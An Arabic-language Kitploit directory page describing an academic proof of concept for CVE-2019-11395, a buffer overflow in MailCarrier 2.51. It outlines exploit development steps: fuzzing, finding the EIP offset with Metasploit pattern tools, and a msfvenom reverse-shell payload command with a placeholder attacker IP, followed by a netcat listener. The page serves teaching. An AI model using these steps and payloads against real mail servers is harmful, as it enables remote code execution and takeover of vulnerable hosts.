Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2019-11395 — إثبات مفهوم لغرض أكاديمي لفهم ثغرة Buffer Overflow باستخدام خلفية CVE-2019-11395 | Kitploit
أدوات/GitHubGitHub/rafaelbicas/cve-2019-11395
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالشيل كودالاختبار العشوائيالتعلم والتعليماستغلال الملفات الثنائية
GitHubrafaelbicas/cve-2019-11395

CVE-2019-11395

إثبات مفهوم لغرض أكاديمي لفهم ثغرة Buffer Overflow باستخدام خلفية CVE-2019-11395

عرض المستودع
3منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2019-11395

نظرة عامة

يُظهر هذا الدليل المفاهيمي (PoC) ثغرة تجاوز سعة المخزن المؤقت في MailCarrier 2.51، مما يسمح للمهاجمين عن بُعد بتنفيذ تعليمات برمجية عشوائية عبر سلسلة طويلة. يمكن استغلال الثغرة باستخدام العمليات التالية:

  • SMTP RCPT TO
  • POP3 USER
  • POP3 LIST
  • POP3 TOP
  • POP3 RETR

يهدف المشروع إلى تقديم منهج أكاديمي لفهم كيفية عمل تجاوز سعة المخزن المؤقت.


⚠️ تحذيرات

قبل تشغيل أي اختبارات، لا تستخدم بيئة الإنتاج الخاصة بك أبدًا للتجارب الأولية. بدلاً من ذلك، قم بإنشاء إعدادات معملية مشابهة لبيئة الإنتاج الخاصة بك لتجنب أي مشكلات أو عواقب غير مقصودة.


🔧 التحضير

1. اكتشاف الثغرة

  • استخدم تقنية الـ Fuzzing لتحديد العدد التقريبي من البايتات اللازمة لتعطل التطبيق.

2. العثور على الإزاحة (Offset)

  • بمجرد حدوث التعطل، استخدم:
    root@kitploit:~
    msf-pattern_create -l <عدد_البايتات>
    

يساعد هذا في تحديد الإزاحة، وهو العدد الدقيق للبايتات المطلوبة لاستبدال EIP.

  • استخدم الأمر التالي لتأكيد الإزاحة:
    root@kitploit:~
    msf-pattern_offset -q <البايتات_المسجلة_على_EIP> -l <عدد_البايتات>
    

يحدد هذا العدد الدقيق للبايتات المطلوبة للتحكم في EIP.

3. العثور على تعليمة JMP أو CALL

  • حدد موقع تعليمة باستخدام:
    root@kitploit:~
    JMP ESP
    CALL ESP
    

سنستخدم هذا العنوان لإعادة توجيه التنفيذ. كن حذرًا من ASLR أو SafeSEH أو آليات الحماية الأخرى.

4. تحديد الأحرف الضارة (bad chars)

  • استخدم أداة Mona داخل Immunity Debugger للتحقق من الأحرف الضارة.

5. إنشاء شيل كود

  • أنشئ شيل كود مع استبعاد الأحرف الضارة:
    root@kitploit:~
    msfvenom -p <شيل_كود> LHOST=<عنوان_المهاجم_IP> LPORT=443 -b "<قائمة_الأحرف_الضارة>" exitfunc=thread -f python
    

6. إضافة تعليمات NOP

  • أدخل تعليمات NOP (\x90) في الحمولة لتحسين الاستقرار.

7. إنشاء اتصال

  • استخدم netcat (nc) لإنشاء شل عكسي والاتصال بالهدف.
تنزيل الأداة